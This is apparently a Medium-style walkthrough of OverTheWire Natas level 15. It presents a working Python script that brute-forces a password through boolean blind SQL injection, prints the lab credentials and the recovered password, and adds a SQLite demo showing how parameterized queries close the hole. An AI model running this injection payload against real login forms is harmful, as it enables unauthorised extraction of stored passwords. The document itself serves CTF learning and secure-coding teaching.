OverTheWire:- Updated Natas Walkthrough — Level 15

Samxia99
Apr 6, 2024

Hello everyone, I would like to share how I solved the Natas CTF. Here is the updated password as well; I hope this write-up will be helpful.

Hello folks!!! It's samxia99.

My Bio link:-https://beacons.ai/samxia99

Greetings everyone! I’m excited to share with you how I was able to successfully conquer a CTF challenge. Through this write-up, I’ll provide a clear explanation of my techniques and strategies, and I’m confident that it will greatly benefit those who are interested in CTF challenges. So, sit back, relax, and let me take you on an informative journey.

Just a quick reminder that the game has been updated, so the password has also been changed. I hope this password is helpful!

Natas Level 14 → Level 15

  • Here are the login details.
Username: natas15
URL: http://natas15.natas.labs.overthewire.org
  • After logging in we can see this page.
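  • Let's view the source code.
  • This level is a Boolean-based blind SQL injection, so we can solve it with an SQL query sent in the username field: "username": 'natas16" AND password LIKE BINARY "' + "". The page only answers whether the user exists or not, so each request tells us whether a guessed password prefix is right. We can put this query in a Python script and brute force the password one character at a time.
  • Here is the script. Save it as a .py file and run it to brute force the password.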
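import requests

# Candidate characters for each position of the password
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

# HTTP basic-auth credentials for this level
username = "natas15"
password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"

url = "http://natas15.natas.labs.overthewire.org"

session = requests.Session()

current_password = list()

# Extend the known prefix one character at a time until all 32 are found
while len(current_password) < 32:
    for character in characters:
        print("Trying with: " + "".join(current_password) + character)
        # LIKE BINARY makes the prefix match case-sensitive, '%' matches the
        # unknown rest, and '#' comments out the remainder of the query
        response = session.post(url, data={"username": 'natas16" AND password LIKE BINARY "' + "".join(current_password) + character + '%" #'}, auth=(username, password))
        if "This user exists." in response.text:
            current_password.append(character)
            break
    else:
        # No candidate matched, so stop instead of looping forever
        break

print("Password: " + "".join(current_password))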
  • Use Python to run our .py file and it will start to brute force.
  • Here we get the password after the brute force has been done.
Pass:-TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
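
Why the yes/no answer leaks the password, and what closes the hole: this is an added example, not code from the level or from the write-up above. It assumes a local in-memory SQLite table with a made-up password as a stand-in for the level's database, so the probe uses single quotes, GLOB and `--` where the script above uses double quotes, LIKE BINARY and `#`; all function names are hypothetical.

```python
import sqlite3


def make_db():
    """In-memory table with one constructed user (not the real level data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('natas16', 'Ab3xSAMPLE')")
    return conn


def user_exists_vulnerable(conn, username):
    # Input is pasted into the SQL text: a quote in it ends the string
    # literal and everything after it is parsed as SQL.
    query = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchone() is not None


def user_exists_safe(conn, username):
    # Bound parameter: the whole input is compared as a literal username.
    query = "SELECT 1 FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchone() is not None


def prefix_probe(prefix):
    # Same shape as the write-up's payload, adapted to SQLite syntax
    # (GLOB is SQLite's case-sensitive pattern match, '*' is its wildcard).
    return "natas16' AND password GLOB '" + prefix + "*' --"


def oracle_answers(check, conn, prefixes):
    """Map each guessed prefix to the yes/no answer the page would show."""
    return {p: check(conn, prefix_probe(p)) for p in prefixes}


if __name__ == "__main__":
    db = make_db()
    guesses = ["A", "Ab", "ab", "Zz"]
    print("vulnerable:", oracle_answers(user_exists_vulnerable, db, guesses))
    print("safe:      ", oracle_answers(user_exists_safe, db, guesses))
```

With the concatenated query the answer changes with the guessed prefix, which is the signal the brute-force script relies on; with the bound parameter every probe is just a username that does not exist.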

Hopefully, this write-up will be useful for everybody, I have tried to make it easy to read.

Next level:-https://medium.com/@samarthkokil64/overthewire-updated-natas-walkthrough-level-16-d3cb5b3f6c2e

Previous level:-https://medium.com/@samarthkokil64/overthewire-updated-natas-walkthrough-level-14-56d78dddd384

PS:- THANKS FOR READING
